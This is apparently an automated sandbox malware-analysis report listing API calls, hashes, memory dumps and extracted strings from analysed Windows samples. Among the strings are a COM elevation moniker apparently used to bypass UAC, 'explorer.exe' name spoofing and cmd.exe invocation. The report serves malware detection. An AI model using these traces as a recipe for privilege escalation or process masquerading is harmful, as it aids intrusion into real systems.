                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocLocal
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3494564517-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f3e2705f243469e8b18360c5bb887dd51615c543d62bfa3a82b819ceace6c8ed
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4f1da3139afef55b26450597318142262e87c8731a1b2672ee4cfa4472a97f69
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3e2705f243469e8b18360c5bb887dd51615c543d62bfa3a82b819ceace6c8ed
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CB0123564430CBBD6006BC8EC05FE5379CE708A1AF000010FA0C86140D6A0B84046A6
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040AEB6,?,?,004046B5), ref: 0040D1FE
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0040D336
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040D3A8
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$HandleModule
                                                                                                                                                                                                                                                                                                                                                                  • String ID: advapi32.dll$kernel32.dll$ntdll.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2593893887-1356967432
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 77f18392bb993366c1df7b453053b3aeb51cb4a2013aefc10122c1c1374fb3f4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ca720bcfbdb204521244a6d16e88fbee784b87e4b750a5d7fd7297a05bd30f3d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77f18392bb993366c1df7b453053b3aeb51cb4a2013aefc10122c1c1374fb3f4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC511DF2D10210EFD304BFA1BCC28393AB5E649305744457FF985A72A1F6B9A9448B6B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RtlNtStatusToDosError.NTDLL(C0000023), ref: 004037E8
                                                                                                                                                                                                                                                                                                                                                                  • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 004037EF
                                                                                                                                                                                                                                                                                                                                                                  • RtlInitUnicodeString.NTDLL(?,00007FFD), ref: 00408342
                                                                                                                                                                                                                                                                                                                                                                  • RtlExpandEnvironmentStrings_U.NTDLL(00000000,?,?,00000000), ref: 00408372
Strings
Memory Dump Source
• Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_93B.jbxd
Yara matches
Similarity
• API ID: Error$EnvironmentExpandInitLastRestoreStatusStringStrings_UnicodeWin32
• String ID: #
• API String ID: 4202685462-1885708031
• Opcode ID: d2950aec320787fbfdd949c7a338a73876b2f1d301fb6a4be3977a861f702f93
• Instruction ID: 2625ad76528c3a05819e41784e94355af3192e6a8ec1aace2841fc774e878e1c
• Opcode Fuzzy Hash: d2950aec320787fbfdd949c7a338a73876b2f1d301fb6a4be3977a861f702f93
• Instruction Fuzzy Hash: D5115175D14209EFDB14DFE4C984AAEBB79EF08301F10856AE915B32C0EB789705CB56
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_93B.jbxd
Yara matches
Similarity
• API ID:
• String ID: $$Elevation:Administrator!new:
• API String ID: 0-4251798642
• Opcode ID: 62b649c32f93d2337679038de5d7ba034d8f130c97f012f79e63509bd4f77841
• Instruction ID: 0ae50f5eb3c30b6def060569edfd5a96dae8f03997bbe75f6d7b2be729599e56
• Opcode Fuzzy Hash: 62b649c32f93d2337679038de5d7ba034d8f130c97f012f79e63509bd4f77841
• Instruction Fuzzy Hash: B31154B1C1020CABCB10EF94DD85AEE7778AB54305F14456AFA097A181E738EB44CBA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• CoGetObject.OLE32(?,00000024,?,?), ref: 0040D1EB
Strings
Memory Dump Source
• Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_93B.jbxd
Yara matches
Similarity
• API ID: Object
• String ID: $$Elevation:Administrator!new:
• API String ID: 2936123098-4251798642
• Opcode ID: 69272883a17b5f6f07e2d21893714d2c4baf9a1707031f0601c46702adeeea6a
• Instruction ID: b31a3ccbf289bc63fcd2c03f84205c468a6b0dd351633bc6c62a4601e098767b
• Opcode Fuzzy Hash: 69272883a17b5f6f07e2d21893714d2c4baf9a1707031f0601c46702adeeea6a
• Instruction Fuzzy Hash: 140162B2810208ABCB05EF90DC95DDE7B78AB18305F08455EF9057A181EB39E748CB75
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00405C4C: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401244
  • Part of subcall function 00405C4C: LocalFree.KERNEL32(00000000), ref: 00403BD3
  • Part of subcall function 00405C4C: OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 00409C94
• ExitProcess.KERNEL32 ref: 0040A945
  • Part of subcall function 00405312: RtlInitUnicodeString.NTDLL(?,00007FFD), ref: 00408342
  • Part of subcall function 00405312: RtlExpandEnvironmentStrings_U.NTDLL(00000000,?,?,00000000), ref: 00408372
Strings
Memory Dump Source
• Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_93B.jbxd
Yara matches
Similarity
• API ID: Process$ChangeCloseEnvironmentExitExpandFindFreeInitLocalNotificationOpenStringStrings_TokenUnicode
• String ID: %systemroot%\system32\cmd.exe$/C
• API String ID: 1629495445-3057154508
• Opcode ID: e58d919228d2999fb42e63e86339d7c771dc9b38e1630fc07efea9b8c1ce01d4
• Instruction ID: 6885a5c3f576ce6d6f9b2f3c688c14414178aeb406d1450dcc701d4c4953fbe4
• Opcode Fuzzy Hash: e58d919228d2999fb42e63e86339d7c771dc9b38e1630fc07efea9b8c1ce01d4
• Instruction Fuzzy Hash: 88F0A4F280030866CB10EB70DC46FDA33389B14305F0045BAB609B60C2EE7997C88AAD
Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RtlInitUnicodeString.NTDLL(?,00520000), ref: 004050CC
                                                                                                                                                                                                                                                                                                                                                                  • RtlInitUnicodeString.NTDLL(?,explorer.exe), ref: 004050DE
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2461846075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2461792329.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462076870.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2462347518.000000000046E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: InitStringUnicode
                                                                                                                                                                                                                                                                                                                                                                  • String ID: explorer.exe
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4228678080-3187896405
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7d548acef704560823f98ce8b990f017fce1fd689d344c9a11bc31deb3c59b97
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 050ed0569a6514cfdb40d37d4b6a842c1993e2635d6f26a1999b978f90a0d4ff
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d548acef704560823f98ce8b990f017fce1fd689d344c9a11bc31deb3c59b97
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BAF09074204248EFCB04CF54C880E6ABBA6FB49304F20855AFC0597381C674ED91CB9A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 116 409b30-409b54 GetSystemInfo VirtualQuery 117 409be4-409beb 116->117 118 409b5a 116->118 119 409bd9-409bde 118->119 119->117 120 409b5c-409b63 119->120 121 409bc5-409bd7 VirtualQuery 120->121 122 409b65-409b69 120->122 121->117 121->119 122->121 123 409b6b-409b73 122->123 124 409b84-409b95 VirtualProtect 123->124 125 409b75-409b78 123->125 126 409b97 124->126 127 409b99-409b9b 124->127 125->124 128 409b7a-409b7d 125->128 126->127 130 409baa-409bad 127->130 128->124 129 409b7f-409b82 128->129 129->124 129->127 131 409b9d-409ba6 call 409b28 130->131 132 409baf-409bb1 130->132 131->130 132->121 134 409bb3-409bc0 VirtualProtect 132->134 134->121
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                                                                                                                                                                                                                                                                                                                                  • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                                                                                                                                                                                                                                                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2441996862-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                                                                                                                                                                                                                                                                                                  • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                                                                                                                                                                                                                                                                                  • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3256987805-3653653586
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32 ref: 0040A0F4
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,01FB0868), ref: 0040966C
                                                                                                                                                                                                                                                                                                                                                                  • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowLongA.USER32(000D023E,000000FC,00409918), ref: 0040A148
                                                                                                                                                                                                                                                                                                                                                                  • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                                                                                                                                                                                                                                                                                                  • 73EA5CF0.USER32(000D023E,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                                                                                                                                                                                                                                                                                                                                  • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3341979996-3001827809
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a1ec2b29f79e5ff862fc4fad7e4f310b8339f10a1453332cc6b7faa73b6a426b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2411F71600205DFD710EBA9EE8AB9977A4EB45304F10467EF514B73E2CBB8A811CB9D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1646373207-2130885113
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4a4222b704d734fa8d0781b40c04fe9f9c76e7b4f133337d95099c0c8a01123f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20017170748342AEFB00BB72DD4AB163A68E785704F50457BF5407A2D3DABD4C04DA6D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
• SetWindowLongA.USER32(000D023E,000000FC,00409918), ref: 0040A148
  • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
  • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,01FB0868,00409A90,00000000,00409A77), ref: 00409A14
  • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,01FB0868,00409A90,00000000), ref: 00409A28
  • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
  • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
  • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,01FB0868,00409A90), ref: 00409A5C
• RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
• 73EA5CF0.USER32(000D023E,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
Strings
Memory Dump Source
• Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
Similarity
• API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
• String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
• API String ID: 978128352-3001827809
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,01FB0868,00409A90,00000000,00409A77), ref: 00409A14
• CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,01FB0868,00409A90,00000000), ref: 00409A28
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
• GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
• CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,01FB0868,00409A90), ref: 00409A5C
  • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,01FB0868), ref: 0040966C
Strings
Memory Dump Source
• Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
